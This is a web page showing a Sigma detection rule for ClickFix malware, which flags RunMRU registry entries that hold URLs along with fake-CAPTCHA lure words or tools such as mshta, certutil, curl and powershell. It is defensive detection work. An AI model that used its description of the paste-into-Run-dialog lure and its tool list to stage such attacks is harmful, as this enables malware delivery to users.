Detectionhighexperimental
Potential ClickFix Execution Pattern - Registry
Detects potential ClickFix malware execution patterns by monitoring registry modifications in RunMRU keys containing HTTP/HTTPS links. ClickFix is known to be distributed through phishing campaigns and uses techniques like clipboard hijacking and fake CAPTCHA pages. Through the fakecaptcha pages, the adversary tricks users into opening the Run dialog box and pasting clipboard-hijacked content, such as one-liners that execute remotely hosted malicious files or scripts.
Convert In Phoenix Studio
Open this Sigma rule in the converter with the YAML preloaded and ready for backend selection.
Launch
Swachchhanda Shrawan Poudel (Nextron Systems)Created Tue Mar 25Updated Wed Nov 19f5fe36cf-f1ec-4c23-903d-09a3110f6bbbwindows
Log Source
WindowsRegistry Set
ProductWindows← raw: windows
CategoryRegistry Set← raw: registry_set
Detection Logic
Detection Logic3 selectors
detection:
selection_registry:
TargetObject|contains: '\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\'
selection_details:
Details|contains:
- 'http://'
- 'https://'
selection_susp_pattern:
- Details|contains:
# Add more suspicious keywords
- 'account'
- 'anti-bot'
- 'botcheck'
- 'captcha'
- 'challenge'
- 'confirmation'
- 'fraud'
- 'human'
- 'identification'
- 'identificator'
- 'identity'
- 'robot'
- 'validation'
- 'verification'
- 'verify'
- Details|contains:
- '%comspec%'
- 'bitsadmin'
- 'certutil'
- 'cmd'
- 'cscript'
- 'curl'
- 'finger'
- 'mshta'
- 'powershell'
- 'pwsh'
- 'regsvr32'
- 'rundll32'
- 'schtasks'
- 'wget'
- 'wscript'
condition: all of selection_*False Positives
Legitimate applications using RunMRU with HTTP links
MITRE ATT&CK
Tactics
Sub-techniques
Rule Metadata
Rule ID
f5fe36cf-f1ec-4c23-903d-09a3110f6bbb
Status
experimental
Level
high
Type
Detection
Created
Tue Mar 25
Modified
Wed Nov 19
Path
rules/windows/registry/registry_set/registry_set_potential_clickfix_execution.yml
Raw Tags
attack.executionattack.t1204.001